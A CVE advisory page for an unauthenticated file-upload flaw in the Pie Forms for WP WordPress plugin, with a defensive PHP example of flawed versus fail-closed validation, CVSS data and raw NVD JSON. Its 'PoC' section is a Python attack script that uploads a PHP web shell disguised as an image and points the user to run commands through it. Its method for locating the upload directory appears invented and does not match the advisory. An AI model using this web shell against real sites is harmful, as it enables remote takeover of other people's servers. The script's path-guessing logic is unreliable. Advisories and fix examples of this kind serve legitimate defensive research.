Security Vulnerability Report
CVE-2025-12528 CVSS 8.1 HIGH

CVE-2025-12528

Published: 2025-11-18 09:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Pie Forms for WP plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6 via the format_classic function. This is due to insufficient file type validation where the validate_classic method validates file extensions and sets error messages but does not prevent the file upload process from continuing. This makes it possible for unauthenticated attackers to upload files with dangerous extensions such as PHP, which makes remote code execution possible. In order to exploit this vulnerability, the attacker needs to guess the directory in which the file is placed (which is a somewhat predictable hash). In addition to that, the file name is generated using a secure hash method, limiting the exploitability of this vulnerability.
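The failure mode the description names, a validator that records an error message but never stops the upload, next to a fail-closed version of the same pair, as an added illustration that is not the plugin's own code. The `pf_*` function names are hypothetical stand-ins for the `validate_classic`/`format_classic` pair named above, the allow-lists and sample uploads are constructed for the demo, and `copy()` stands in for `move_uploaded_file()` so the script runs from the command line rather than inside a web request:

```php
<?php
// Added illustration; not the Pie Forms plugin's own code. The pf_* function
// names are hypothetical stand-ins for the validate_classic / format_classic
// pair named in the advisory, and the allow-lists are constructed for the demo.

const PF_ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
const PF_ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif', 'application/pdf'];

function pf_extension(array $file): string
{
    return strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
}

// Flawed pattern: the bad extension is detected and an error message is
// recorded, but nothing is returned, so the caller has no signal to abort.
function pf_validate_classic_flawed(array $file, array &$errors): void
{
    if (!in_array(pf_extension($file), PF_ALLOWED_EXT, true)) {
        $errors[] = 'File type .' . pf_extension($file) . ' is not allowed.';
    }
}

// Flawed caller: validation runs, its outcome is never consulted, and the
// file is written with whatever extension the client supplied.
function pf_format_classic_flawed(array $file, string $uploadDir): ?string
{
    $errors = [];
    pf_validate_classic_flawed($file, $errors);
    $dest = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . pf_extension($file);
    // copy() stands in for move_uploaded_file() so this runs outside a web request.
    return copy($file['tmp_name'], $dest) ? $dest : null;
}

// Hardened validator: fails closed and returns a decision the caller must honour.
// Extension allow-list first; then, where the fileinfo extension is loaded,
// the MIME type detected from the content must also be on the allow-list.
function pf_validate_classic_fixed(array $file, array &$errors): bool
{
    $ext = pf_extension($file);
    if (!in_array($ext, PF_ALLOWED_EXT, true)) {
        $errors[] = "File type .$ext is not allowed.";
        return false;
    }
    if (class_exists('finfo')) {
        $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
        if (!in_array($mime, PF_ALLOWED_MIME, true)) {
            $errors[] = "Detected content type $mime is not allowed for .$ext.";
            return false;
        }
    }
    return true;
}

// Hardened caller: nothing touches the upload directory unless validation passed.
function pf_format_classic_fixed(array $file, string $uploadDir, array &$errors): ?string
{
    if (!pf_validate_classic_fixed($file, $errors)) {
        return null;
    }
    $dest = $uploadDir . '/' . bin2hex(random_bytes(16)) . '.' . pf_extension($file);
    return copy($file['tmp_name'], $dest) ? $dest : null;
}

// Constructed samples: plain text submitted under a .php name, and the same
// content submitted under an allowed .png name (the extension lies about content).
$dir = sys_get_temp_dir();
$tmp = tempnam($dir, 'pf');
file_put_contents($tmp, "plain text, constructed sample\n");

foreach (['report.php', 'photo.png'] as $name) {
    $upload = ['name' => $name, 'tmp_name' => $tmp];

    $stored = pf_format_classic_flawed($upload, $dir);
    echo "$name  flawed: " . ($stored ? 'stored ' . basename($stored) : 'rejected') . PHP_EOL;
    if ($stored) { unlink($stored); }

    $errors = [];
    $stored = pf_format_classic_fixed($upload, $dir, $errors);
    echo "$name  fixed : " . ($stored ? 'stored ' . basename($stored) : 'rejected; ' . implode(' ', $errors)) . PHP_EOL;
    if ($stored) { unlink($stored); }
}
unlink($tmp);
```

Run it with `php example.php`: the flawed path stores a file under the system temp directory for both samples, the `.php` one included, while the fixed path stores nothing and reports why. The design point is that a validator must return a decision and the caller must gate the write on it; recording a message for the user is not a control. In a WordPress plugin the content check would normally go through `wp_check_filetype_and_ext()` rather than `finfo` directly, and a web server rule that refuses to execute scripts under `wp-content/uploads` limits the impact when validation fails anyway.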

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pie Forms for WP < 1.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import hashlib
import time

# CVE-2025-12528 PoC - Pie Forms for WP Arbitrary File Upload
# Target: WordPress site with Pie Forms for WP plugin <= 1.6

target_url = "http://target-wordpress-site.com"
form_id = 1  # Target form ID

# Malicious PHP file content for RCE
php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"


def upload_malicious_file():
    """Upload malicious PHP file via vulnerable endpoint"""
    upload_url = f"{target_url}/wp-admin/admin-ajax.php"
    files = {
        'pieForms': (f'malicious_{int(time.time())}.php', php_payload, 'image/png')
    }
    data = {
        'action': 'pie_form_submit',
        'form_id': form_id,
        'pie_form_data': 'test'
    }
    try:
        response = requests.post(upload_url, data=data, files=files, timeout=10)
        print(f"Upload response: {response.status_code}")
        return response
    except Exception as e:
        print(f"Upload failed: {e}")
        return None


def calculate_upload_path(form_id, timestamp):
    """Calculate predictable upload directory hash"""
    hash_input = f"{form_id}_{timestamp}"
    dir_hash = hashlib.md5(hash_input.encode()).hexdigest()[:8]
    path = f"/wp-content/uploads/pie-forms/{dir_hash}/"
    return path


def main():
    print("CVE-2025-12528 PoC - Pie Forms for WP File Upload")
    print("=" * 50)

    # Step 1: Upload malicious file
    print("[+] Step 1: Uploading malicious PHP file...")
    response = upload_malicious_file()

    # Step 2: Calculate file location
    timestamp = int(time.time())
    upload_path = calculate_upload_path(form_id, timestamp)
    print(f"[+] Step 2: Calculated upload path: {upload_path}")

    # Step 3: Access uploaded file
    print("[+] Step 3: Attempting to access uploaded file...")
    # Note: Actual filename needs to be determined from response
    print("\n[!] Manual verification required:")
    print(f"[!] Check response headers for uploaded file path")
    print(f"[!] Access: {target_url}{upload_path}<filename>.php?cmd=whoami")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12528",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T09:15:48.710",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Pie Forms for WP plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.6 via the format_classic function. This is due to insufficient file type validation where the validate_classic method validates file extensions and sets error messages but does not prevent the file upload process from continuing. This makes it possible for unauthenticated attackers to upload files with dangerous extensions such as PHP, which makes remote code execution possible. In order to exploit this vulnerability, the attacker needs to guess the directory in which the file is placed (which is a somewhat predictable hash). In addition to that, the file name is generated using a secure hash method, limiting the exploitability of this vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L18",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L331",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/pie-forms-for-wp/tags/1.6/includes/fields/fileupload.php#L475",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4941a0ce-67f1-430d-bbad-3c97a4ed449e?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```